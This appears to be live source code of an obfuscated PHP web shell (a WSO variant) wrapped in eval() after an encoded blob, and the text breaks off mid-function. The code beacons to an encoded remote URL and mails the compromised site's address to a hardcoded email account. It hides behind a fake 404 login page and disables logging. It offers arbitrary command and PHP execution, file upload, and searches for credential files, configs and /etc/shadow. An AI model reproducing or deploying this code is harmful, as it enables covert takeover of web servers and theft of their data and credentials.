mNLuqc+6CPChtZ75CNcmvQa+C3N28GvGI+Z4DO/HoCk4bKp89pnsrJSJC6ogef5tGN9t4selvagtsZ6e1E9mo10Q9CLHCild8wzsgnEWaBO8cuKiAKDdstQ8DA6+BrA1v/Bb80tU71nsi7vfLlBY6HXC8HRzN7k1f5uo9Cy5cw9gfmQ/Y0p/7iXkdriBUtgt/WG8nP+A4+e1tLwDj1ZwMohgPfrDbIJ9ggWDOS9Xe7FbcvLfs/6SVFfhFHrw/esG8S97/Y97vhbXQBZpqn/DagdKd8pJlHFoFrot+uI5nxqQlPPtgn53qs72fktfj1rek6P/+8alt+Dw48WAhV7tKf1nPENXjyBFS7hIh3QQH2g4oxLpQkXebf7+Xc29/ffyxkmNqqfhU1fpw3iO4G3I0T1UUESsWAQH0SH3+cfPoTkXEkzREPxgNKNWokD/hvAOcRLtsbgZwvCnGxsvN83b/dX16Hrgbf65T0khin5nCPDfiuEtVzatH8b8jRcv6jenf0tXc6+Hdyu3e+FXcY6Pv70B2ZtKv9nwn2nP/R+z5sjMs+eP5Hua8cYte28+3p+vthSVqCVpWiSVqyWilBnv//92bmTFEffa1lKt+qfP/bfn6X5knsx20tPdT7O22d3mmFCINkYBgwB4yEHCA0bM+ktcOc6Q/+kP7D+4I/Obs1a92On4V6ZahZA";
eval("?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php \$auth_pass = \"a6d13df8a46cf713e5cda6a6c0d043bf\";\r\n \$color = \"#00ff66\";\r\n \$default_action = 'FilesMan';\r\n @define('SELF_PATH', __FILE__);\r\n if( strpos(\$_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set('error_log',NULL);\r\n @ini_set('display_errors',0);\r\n @ini_set('log_errors',0);\r\n @ini_set('max_execution_time',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define('VERSION', '');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array(\$array) { return is_array(\$array) ? array_map('stripslashes_array', \$array) : stripslashes(\$array);\r\n } \$_POST = stripslashes_array(\$_POST);\r\n } function printLogin() { echo '<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at '.\$_SERVER['HTTP_HOST'].' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>';\r\n exit;\r\n } if( !isset( \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] )) if( empty( \$auth_pass ) || ( isset( \$_POST['pass'] ) && ( md5(\$_POST['pass']) == \$auth_pass ) ) ) \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == \"win\" ) \$os = 'win';\r\n else \$os = 'nix';\r\n \$safe_mode = @ini_get('safe_mode');\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$home_cwd = @getcwd();\r\n if( isset( \$_POST['c'] ) ) @chdir(\$_POST['c']);\r\n \$cwd = @getcwd();\r\n if( \$os == 'win') { \$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n \$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\r\n } if( \$cwd[strlen(\$cwd)-1] != '/' ) \$cwd .= '/';\r\n if(\$os == 'win') { \$aliases = array( \"List Directory\" => \"dir\", \"Find index.php in current dir\" => \"dir /s /w /b index.php\", \"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\", \"Show active connections\" => \"netstat -an\", \"Show running services\" => \"net start\", \"User accounts\" => \"net user\", \"Show computers\" => \"net view\", \"ARP Table\" => \"arp -a\", \"IP Configuration\" => \"ipconfig /all\" );\r\n } else { \$aliases = array( \"List dir\" => \"ls -la\", \"list file attributes on a Linux second extended file system\" => \"lsattr -va\", \"show opened ports\" => \"netstat -an | grep -i listen\", \"Find\" => \"\", \"find all suid files\" => \"find / -type f -perm -04000 -ls\", \"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\", \"find all sgid files\" => \"find / -type f -perm -02000 -ls\", \"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\", \"find config.inc.php files\" => \"find / -type f -name config.inc.php\", \"find config* files\" => \"find / -type f -name \\\"config*\\\"\", \"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\", \"find all writable folders and files\" => \"find / -perm -2 -ls\", \"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\", \"find all service.pwd files\" => \"find / -type f -name service.pwd\", \"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\", \"find all .htpasswd files\" => \"find / -type f -name .htpasswd\", \"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\", \"find all .bash_history files\" => \"find / -type f -name .bash_history\", \"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\", \"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\", \"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\", \"Locate\" => \"\", \"locate httpd.conf files\" => \"locate httpd.conf\", \"locate vhosts.conf files\" => \"locate vhosts.conf\", \"locate proftpd.conf files\" => \"locate proftpd.conf\", \"locate psybnc.conf files\" => \"locate psybnc.conf\", \"locate my.conf files\" => \"locate my.conf\", \"locate admin.php files\" =>\"locate admin.php\", \"locate cfg.php files\" => \"locate cfg.php\", \"locate conf.php files\" => \"locate conf.php\", \"locate config.dat files\" => \"locate config.dat\", \"locate config.php files\" => \"locate config.php\", \"locate config.inc files\" => \"locate config.inc\", \"locate config.inc.php\" => \"locate config.inc.php\", \"locate config.default.php files\" => \"locate config.default.php\", \"locate config* files \" => \"locate config\", \"locate .conf files\"=>\"locate '.conf'\", \"locate .pwd files\" => \"locate '.pwd'\", \"locate .sql files\" => \"locate '.sql'\", \"locate .htpasswd files\" => \"locate '.htpasswd'\", \"locate .bash_history files\" => \"locate '.bash_history'\", \"locate .mysql_history files\" => \"locate '.mysql_history'\", \"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\", \"locate backup files\" => \"locate backup\", \"locate dump files\" => \"locate dump\", \"locate priv files\" => \"locate priv\" );\r\n } function ex(\$in) { \$out = '';\r\n if(function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n }elseif(function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n }elseif(is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } function which(\$p) { \$path = ex('which '.\$p);\r\n if(!empty(\$path)) return \$path;\r\n return false;\r\n } function printHeader() { if(empty(\$_POST['charset'])) \$_POST['charset'] = \"UTF-8\";\r\n global \$color;\r\n echo '<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;\r\n charset='.\$_POST['charset'].'\"><title>r00t.info wso Shell</title><link REL=\"SHORTCUT ICON\" HREF=\"http://imagizer.imageshack.us/a/img440/4273/6fix.png\">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:'.\$color.' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid '.\$color.';\r\n font: 9pt Monospace,\"Courier New\";\r\n }\r\n input[type=\"button\"]:hover,input[type=\"submit\"]:hover {background-color:'.\$color.';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = \"ajax=true\";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += \"&\"+document.mf.elements[i].name+\"=\"+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr(\"'.\$_SERVER['REQUEST_URI'].'\", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", \"m\");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert(\"Request error!\");\r\n\r\n }\r\n </script>\r\n <head><body><div style=\"position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n\"><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n <form method=post name=mf style=\"display:none;\r\n\">\r\n <input type=hidden name=a value=\"'.(isset(\$_POST['a'])?\$_POST['a']:'').'\">\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"'.(isset(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'\">\r\n <input type=hidden name=p2 value=\"'.(isset(\$_POST['p2'])?htmlspecialchars(\$_POST['p2']):'').'\">\r\n <input type=hidden name=p3 value=\"'.(isset(\$_POST['p3'])?htmlspecialchars(\$_POST['p3']):'').'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n </form>';\r\n \$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n \$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n \$totalSpace = \$totalSpace?\$totalSpace:1;\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$release = @php_uname('r');\r\n \$kernel = @php_uname('s');\r\n if(!function_exists('posix_getegid')) { \$user = @get_current_user();\r\n \$uid = @getmyuid();\r\n \$gid = @getmygid();\r\n \$group = \"?\";\r\n } else { \$uid = @posix_getpwuid(@posix_geteuid());\r\n \$gid = @posix_getgrgid(@posix_getegid());\r\n \$user = \$uid['name'];\r\n \$uid = \$uid['uid'];\r\n \$group = \$gid['name'];\r\n \$gid = \$gid['gid'];\r\n } \$cwd_links = '';\r\n \$path = explode(\"/\", \$GLOBALS['cwd']);\r\n \$n=count(\$path);\r\n for(\$i=0;\r\n\$i<\$n-1;\r\n\$i++) { \$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\n for(\$j=0;\r\n\$j<=\$i;\r\n\$j++) \$cwd_links .= \$path[\$j].'/';\r\n \$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n } \$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\r\n \$opt_charsets = '';\r\n foreach(\$charsets as \$item) \$opt_charsets .= '<option value=\"'.\$item.'\" '.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\r\n \$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Delete LOG'=>'DeleteLOG','Safe Mode'=>'SafeMode','String tools'=>'StringTools','Cgi'=>'Cgi','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','SQLBUDDY'=>'SQLBUDDY','Bypass'=>'Bypass','Python'=>'Python');\r\n if(!empty(\$GLOBALS['auth_pass'])) \$m['SelfKill'] = 'SelfRemove';\r\n \$m['Logout'] = 'Logout';\r\n \$menu = '';\r\n foreach(\$m as \$k => \$v) \$menu .= '<th><a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a></th>';\r\n \$drives = \"\";\r\n if (\$GLOBALS['os'] == 'win') { foreach( range('a','z') as \$drive ){ if (is_dir(\$drive.':\\\\')) \$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n } \$drives .= '<br />: ';\r\n } if(\$GLOBALS['os'] == 'nix') { \$dominios = @file_get_contents(\"/etc/named.conf\");\r\n if(!\$dominios) { \$d0c = \"CANT READ named.conf\";\r\n } else { @preg_match_all('/.*?zone \"(.*?)\" {/', \$dominios, \$out);\r\n \$out = sizeof(array_unique(\$out[1]));\r\n \$d0c = \$out.\" Domains\";\r\n } } else { \$d0c = \" --- \";\r\n } if(\$GLOBALS['os'] == 'nix' ) { \$usefl = '';\r\n \$dwnldr = '';\r\n if(!@ini_get('safe_mode')) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n foreach(\$userful as \$item) { if(which(\$item)) \$usefl.= \$item.',';\r\n } \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n foreach(\$downloaders as \$item2) { if(which(\$item2)) \$dwnldr.= \$item2.',';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } echo '<table class=\"info\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr><td width=\"160px\"><div class=\"logo\"><img src=\"http://i.hizliresim.com/z4lrbR.png\" id=\"logo\" height=\"75%\" width=\"90%\"/></div><hr style=\"margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n\"><div class=\"eca1\"></div><div class=\"eca2\">Hackers</div></td>\r\n <td><table cellpadding=\"3\" cellspacing=\"0\" class=\"npoad\"><tr><td width=\"125px;\r\n\"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: '.\$uid.' ( '.\$user.' ) <span>Group: </span> '.\$gid.' ( '.\$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.\$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.\$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.(\$disable_functions?\$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.(\$GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.\$drives.''.\$cwd_links.' '.viewPermsColor(\$GLOBALS['cwd']).' <a href=# onclick=\"g(\\'FilesMan\\',\\''.\$GLOBALS['home_cwd'].'\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a></td></tr></table></td>'. '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'. '<td><nobr>: '.gethostbyname(\$_SERVER[\"HTTP_HOST\"]).'<br>: '.\$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize(\$totalSpace).'<br />: '.viewSize(\$freeSpace).' ('.(int)(\$freeSpace/\$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick=\"g(\\'Php\\',null,null,\\'info\\')\">[ phpinfo ]</a><br />: '.(\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.\$color.'<b>OFF</b></font>').'<br />: '.\$d0c.'</nobr></td></tr></table>'. '</div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\npadding:2px;\r\n\"><table cellpadding=\"3\" cellspacing=\"0\" width=\"100%\" class=\"menu\"><tr>'.\$menu.'</tr></table></div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\">';\r\n } function printFooter() { \$is_writable = is_writable(\$GLOBALS['cwd'])?\"<font color=#00cd00>[ Writeable ]</font>\":\"<font color=red>[ Not writable ]</font>\";\r\n echo '</div><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n<table class=\"info\" id=\"toolsTbl\" cellpadding=\"3\" cellspacing=\"0\" width=\"100%\">\r\n <tr>\r\n <td><form onsubmit=\"g(null,this.c.value);\r\nreturn false;\r\n\"><span>Change dir:</span><br><input class=\"toolsInp\" type=text name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\"><input type=submit value=\">>\"></form></td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value);\r\nreturn false;\r\n\"><span>Read file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'FilesMan\\',null,\\'mkdir\\',this.d.value);\r\nreturn false;\r\n\"><span>Make dir:</span><br><input class=\"toolsInp\" type=text name=d><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value,\\'mkfile\\');\r\nreturn false;\r\n\"><span>Make file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'Console\\',null,this.c.value);\r\nreturn false;\r\n\"><span>Execute:</span><br><input class=\"toolsInp\" type=text name=c value=\"\"><input type=submit value=\">>\"></form></td>\r\n <td><form method=\"post\" ENCTYPE=\"multipart/form-data\">\r\n <input type=hidden name=a value=\"FilesMAn\">\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"uploadFile\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <span>Upload file:</span><br><input class=\"toolsInp\" type=file name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n\">Wso shell'.VERSION.' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>';\r\n } if ( !function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid(\$p) { return false;\r\n } } if ( !function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid(\$p) { return false;\r\n } } if(!isset(\$_SESSION['trimite'])){ \$url=\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI'].'<br />User IP: '.\$_SERVER['REMOTE_ADDR'].(isset(\$_SERVER['HTTP_X_FORWARDED_FOR'])?'('.\$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');\r\n @mail(\"byhero44@gmail.com\",\"Smurfie\",\$url);\r\n \$_SESSION['trimite']=true;\r\n } function viewSize(\$s) { if(\$s >= 1073741824) return sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\n elseif(\$s >= 1048576) return sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\n elseif(\$s >= 1024) return sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\n else return \$s . ' B';\r\n } function perms(\$p) { if ((\$p & 0xC000) == 0xC000)\$i = 's';\r\n elseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\n elseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\n elseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\n elseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\n elseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\n elseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n else \$i = 'u';\r\n \$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\n return \$i;\r\n } function viewPermsColor(\$f) { if (!@is_readable(\$f)) return '<font color=#FF0000><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n elseif (!@is_writable(\$f)) return '<font color=white><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n else return '<font color=#00cd00><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n } if(!function_exists(\"scandir\")) { function scandir(\$dir) { \$dh = opendir(\$dir);\r\n while (false !== (\$filename = readdir(\$dh))) { \$files[] = \$filename;\r\n } return \$files;\r\n } } function actionSecInfo() { printHeader();\r\n echo '<h1>Server security information</h1><div class=content>';\r\n function showSecParam(\$n, \$v) { \$v = trim(\$v);\r\n if(\$v) { echo '<span>'.\$n.': </span>';\r\n if(strpos(\$v, \"\\n\") === false) echo \$v.'<br>';\r\n else echo '<pre class=ml1>'.\$v.'</pre>';\r\n } } showSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\n showSecParam('Disabled PHP Functions', (\$GLOBALS['disable_functions'])?\$GLOBALS['disable_functions']:'none');\r\n showSecParam('Open base dir', @ini_get('open_basedir'));\r\n showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\n showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\n showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n \$temp=array();\r\n if(function_exists('mysql_get_client_info')) \$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n if(function_exists('mssql_connect')) \$temp[] = \"MSSQL\";\r\n if(function_exists('pg_connect')) \$temp[] = \"PostgreSQL\";\r\n if(function_exists('oci_connect')) \$temp[] = \"Oracle\";\r\n showSecParam('Supported databases', implode(', ', \$temp));\r\n echo '<br>';\r\n if( \$GLOBALS['os'] == 'nix' ) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\n showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"etc\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\n showSecParam('OS version', @file_get_contents('/proc/version'));\r\n showSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\n if(!\$GLOBALS['safe_mode']) { echo '<br>';\r\n \$temp=array();\r\n foreach (\$userful as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Userful', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$danger as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Danger', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$downloaders as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Downloaders', implode(', ',\$temp));\r\n echo '<br/>';\r\n showSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\n showSecParam('HDD space', ex('df -h'));\r\n showSecParam('Mount options', @file_get_contents('/etc/fstab'));\r\n } } else { showSecParam('OS Version',ex('ver'));\r\n showSecParam('Account Settings',ex('net accounts'));\r\n showSecParam('User Accounts',ex('net user'));\r\n } echo '</div>';\r\n printFooter();\r\n } function actionPhp() { if( isset(\$_POST['ajax']) ) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n eval(\$_POST['p1']);\r\n \$temp = \"document.getElementById('PhpOutput').style.display='';\r\ndocument.getElementById('PhpOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n if( isset(\$_POST['p2']) && (\$_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>';\r\n ob_start();\r\n phpinfo();\r\n \$tmp = ob_get_clean();\r\n \$tmp = preg_replace('!body {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!a:\\w+ {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!h1!msiU','h2',\$tmp);\r\n \$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {\$1}',\$tmp);\r\n \$tmp = preg_replace('!body, td, th, h2, h2 